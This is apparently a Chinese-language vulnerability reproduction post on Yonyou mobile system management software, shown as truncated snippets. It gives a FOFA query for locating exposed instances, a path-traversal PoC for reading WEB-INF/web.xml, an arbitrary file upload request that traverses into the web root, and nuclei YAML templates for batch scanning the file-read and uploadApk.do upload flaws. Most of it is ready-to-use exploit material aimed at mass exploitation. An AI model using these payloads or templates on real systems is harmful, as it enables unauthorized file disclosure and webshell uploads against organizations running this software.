漏洞复现 fofa语法:app="用友-移动系统管理" 登录页面如下: POC:/mobsm/common/download?path=\..\webapps\nc_web\WEB-INF\web.xml nuclei批量yaml文件 id:yonyou_yidong_download_filereadinfo:name:用友移动管理系统download任意文件读取漏洞author:mhb17severity:highdescription:descriptionreference:-https://tags...
用友移动管理系统upload任意文件上传漏洞。 漏洞复现 fofa语法:app="用友-移动系统管理" 登录页面如下: POC: POST /mobsm/common/upload?category=../webapps/nc_web/maupload/apk HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 S...
nuclei批量yaml文件 id:yonyou_yidong_uploadApk_uploadinfo:name:用友移动管理系统uploadApk.do任意文件上传漏洞author:mhb17severity:criticaldescription:descriptionreference:-https://tags:uploadrequests:-raw:-|- POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1 Host: {{Hostname}} User-Agent: Mozil...